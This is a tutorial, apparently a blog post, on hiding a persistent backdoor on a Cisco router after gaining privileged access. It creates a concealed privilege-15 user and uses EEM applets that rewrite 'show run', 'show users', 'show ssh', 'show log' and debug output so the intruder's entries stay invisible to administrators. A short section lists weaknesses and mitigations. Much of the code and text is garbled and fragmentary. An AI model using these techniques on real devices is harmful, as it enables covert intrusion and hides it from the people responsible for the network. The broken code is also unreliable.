: This article is written for research and experimentation purposes only. Only ever access devices you have written, legal authorization to access. Beginning Reminder Okay, so here’s the scenario. You found you way into an elevated command prompt on a Cisco router, and you want to establish a persistent foothold on the device while leaving as few markers as possible. You need to do this with existing code, and you’d like to alter as little as possible. Cisco’s EEM is the answer. Cisco EEM is a programming language built into any modern Cisco IOS switch or router. It allows for all sorts of automatic actions to take place, and it also allows a key feature which we’ll exploit here — it can ‘catch’ a string a user enters and transparently replace it with another string — one which we’ll instruct to exclude our ‘malicious’ pivot code. Okay, so you’re on an exec command line, what’s next? ! Note: Make sure the username contains the string “hidden”, because those are the lines we are hiding from the configuration below Create a user all your own with exec (priv 15) permissions: config username hidden_YourUser priv yourPassword1234 t 15 sec Hide our user and history from any valid admins by proxying valid commands with commands filtered to hide our information. 2. Install a few EEM functions, which do the following: EEM Code: ! Hides the EEM code from the running config command manager applet hidden_eemRunningConfig cli pattern yes cli command cli command puts ! Hides the EEM code the config command manager applet hidden_eemStartupConfig cli pattern yes cli command cli command puts ! Hides the bad actor s active SSH manager applet hidden_sshSession cli pattern yes cli command cli command puts ! Hides the EEM actions showing up via command manager applet hidden_eemLogging cli pattern yes cli command cli command puts ! Hides the EEM showing up more :running more :running-config more :run | ex hidden| | $_cli_result command manager applet hidden_moreStart cli pattern yes cli command cli command puts ! Prevents EEM being debugged, which could catch our malicious EEMs manager applet hidden_EEMdebug cli pattern yes cli command show event event "show run" sync action 0.0 "enable" action 1.0 "show run | ex hidden|event|action" action 2.0 "$_cli_result" from startup show event event "show run" sync action 0.0 "enable" action 1.0 "show start | ex hidden|event|action" action 2.0 "$_cli_result" 's active VTY (telnet/ssh) session event manager applet hidden_VTY event cli pattern "show users" sync yes action 0.0 cli command "enable" action 1.0 cli command "show users | ex hidden" action 2.0 puts "$_cli_result" ! Hides the bad actor' session event event "show ssh" sync action 0.0 "enable" action 1.0 "show ssh | ex hidden" action 2.0 "$_cli_result" from in local logging show event event "show log" sync action 0.0 "enable" action 1.0 "show log | ex HA_EM|hidden" action 2.0 "$_cli_result" and new user from in system " command event manager applet hidden_moreRunning event cli pattern " system " sync yes action 0.0 cli command " enable " action 1.0 cli command " system event action " action 2.0 puts " " ! Hides the EEM and new user from showing up in more system:start" event event "more system:running-config" sync action 0.0 "enable" action 1.0 "more system:start | ex hidden|event|action" action 2.0 "$_cli_result" from in action event event "debug event manager" sync action 0.0 "enable" Weaknesses of This Method 1. Syslog/external logging — No ability to hide the execution of commands in real-time, so they will be logged to an external server if device set up to do so. 2. All EEM scripts are hidden using this method. If administrators utilize EEM for their admin duties, they may become suspicious that their EEM scripts have disappeared. 3. Config backup. If the tool uses snmp to pull a full config, your new config and user are visible. If the tool is like most tools, and simply uses a service account to programmatically run “show run”, your config will stay hidden. 4. The local log of the device will have many hidden lines in its buffer, so it will look short to someone looking closely. 5. If the local log uses line numbers, as recommended by Cisco security best practice (but which is not the default config!), it’ll be evident to someone looking closely that lines are missing. 1. Syslog, syslog, syslog. First, to catch the immediate changes by frequent synchronization to catch the initial changes. Second, to catch the EEM in action, as it catches the legitimate user’s commands and hides itself. Third, to catch any further activity by the bad actor as they perform future activities on the system. Mitigation for Administrators 1. Don’t allow aliasing of existing commands. This is messy programming, and allows many opportunities to cripple a router and confuse admins. Recommendations for Cisco to Fix This Issue : This article is written for research and experimentation purposes only. Only ever access devices you have written, legal authorization to access. Ending Reminder